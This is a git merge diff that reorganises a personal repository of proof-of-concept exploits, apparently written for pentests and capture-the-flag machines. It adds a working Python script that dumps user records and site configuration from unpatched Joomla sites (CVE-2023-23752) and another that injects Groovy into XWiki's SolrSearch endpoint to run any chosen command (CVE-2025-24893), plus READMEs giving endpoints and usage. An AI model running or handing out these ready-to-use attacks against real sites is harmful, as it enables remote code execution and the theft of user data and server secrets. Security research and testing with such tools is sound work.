Merge pull request #1 from 0xVoodoo/reformat

Reformat the repo to store all my PoCs and add CVE-2025-24893
2025-08-18 13:58:33 -06:00
parent 14c0141694 9788148d65
commit 07b56e0cdf
5 changed files with 179 additions and 22 deletions
@@ -0,0 +1,76 @@
 import requests
 import json
 import argparse
 class User:
    def __init__(user, name, email, lastvisitDate, groupNames):
        user.name = name
        user.email = email
        user.lastvisitDate = lastvisitDate
        user.groupNames = groupNames
    def __str__(user):
        return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}"
 def vulnCheck(tgt):
    verUrl = tgt + "/administrator/manifests/files/joomla.xml"
    verData = requests.get(verUrl)
    if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower():
        print("[-] Site does not appear to be vulnerable!")
        raise SystemExit
 def getUsers(tgt):
    usrUrl = tgt + "/api/index.php/v1/users?public=true"
    usrData = requests.get(usrUrl)
    if "404" in usrData.text.lower() or "403" in usrData.text.lower():
        print("[-] Error fetching user data, site may not be vulnerable")
        raise SystemExit
    parsedUsrs = json.loads(usrData.text)
    return parsedUsrs
 def parseUsers(usrData):
    users = []
    for user in usrData["data"]:
        userAtribs = user["attributes"]
        newUser = User(userAtribs["username"],
                       userAtribs["email"],
                       userAtribs["lastvisitDate"],
                       userAtribs["group_names"] )
        users.append(newUser)
    return users
 def getConfig(tgt):
    cfgUrl = tgt + "/api/index.php/v1/config/application?public=true"
    cfgData = requests.get(cfgUrl)
    if "404" in cfgData.text.lower() or "403" in cfgData.text.lower():
        print("[-] Error fetching user data, site may not be vulnerable")
        raise SystemExit
    parsedCfg = json.loads(cfgData.text)
    return parsedCfg
 if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo')
    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
    args = parser.parse_args()
    tgt = args.target.lower()
    if tgt[4] != "http" and tgt[5] != "https":
        print("[*] No URL schema specified, defaulting to HTTP")
        tgt = "http://" + tgt
    vulnCheck(tgt)
    print(f"\n[+] User data found!") 
    print("----------")
    for user in parseUsers(getUsers(tgt)):
        print(user)
        print("----------")
    print(f"\n[+] Config data found!")
    print("----------")
    for i in getConfig(tgt)["data"]:
        print(i["attributes"])
@@ -0,0 +1,27 @@
 # CVE-2023-23752 - Joomla Information Disclosure
 Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
 I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
 ---
 This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
 #### User Info
 `/api/index.php/v1/config/applicaton?public=true`
 #### Config Info
 `/api/index.php/v1/config/application?public=true"`
 ## Usage
 `python3 CVE-2023-23752.py -t <target_url>`
 ---
 # License
 GPL v3.0 - as all good software should be
 Remember - don't be a skid :)
@@ -0,0 +1,59 @@
 import requests
 import argparse
 import urllib.parse
 # Pretty colors :)
 RED = "\033[31m"
 GREEN = "\033[32m"
 YELLOW = "\033[33m"
 BOLD = "\033[1m"
 RESET = "\033[0m"
 def testVuln(target):
    try:
        resp = requests.get(target)
    except requests.exceptions.RequestException as error:
        print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
        raise SystemExit(error)
    if "xwiki" not in resp.text.lower():
        print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
        return False
    else:
        return True
 def exploit(target, cmd):
    payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
    exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}' 
    try:
        print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
        resp = requests.get(exploitUrl)
    except requests.exceptions.RequestException as error:
        print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
        raise SystemExit(error)
    print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
 if __name__ == "__main__":
    parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
                                     description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
                                     epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
    parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
    parser.add_argument('-c', '--command', required=True, help='Command to execute')
    args = parser.parse_args()
    print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
    tgt = args.target.lower()
    if tgt[4] != "http" and tgt[5] != "https":
        print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
        tgt = 'http://' + tgt
    if testVuln(tgt):
        exploit(tgt, args.command)
    else:
        raise SystemExit()
@@ -0,0 +1,11 @@
 # CVE-2025-24893 - XWiki RCE
 This vuln stems from improper user input sanitization when passing SolrSearch queries. Arbitrary groovy code can be executed due to a direct evaluate() call.
 The vulnerable endpoint here is:
 `/xwiki/bin/get/Main/SolrSearch?media=rss&text=`
 # License
 GPL v3.0 - as all good software should be
 Remember - don't be a skid :)
@@ -1,27 +1,11 @@
-# CVE-2023-23752 - Joomla Information Disclosure
+# PoCs
-Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby...
+This repo contains proof of concept exploits for vulnerabilities I've come across in pentests and CTFs. This goes without saying but I am not liable for any misuse of these scripts, please be responsible.
 I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick".
 ---
 This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints:
 #### User Info
 `/api/index.php/v1/config/applicaton?public=true`
 #### Config Info
 `/api/index.php/v1/config/application?public=true"`
 ## Usage
 `python3 CVE-2023-23752.py -t <target_url>`
 ---
 # Exploits
 - [CVE-2023-23752](https://github.com/0xVoodoo/PoCs/CVE-2023-23752) - Information disclosure in Joomla CMS.
 - [CVE-2025-24893](https://github.com/0xVoodoo/PoCs/CVE-2025-24893) - RCE in XWiki.
 # License
-GPL v3.0 - as all good software should be
+GPLv3 as all good software (or exploits I guess) should be.
 Remember - don't be a skid :)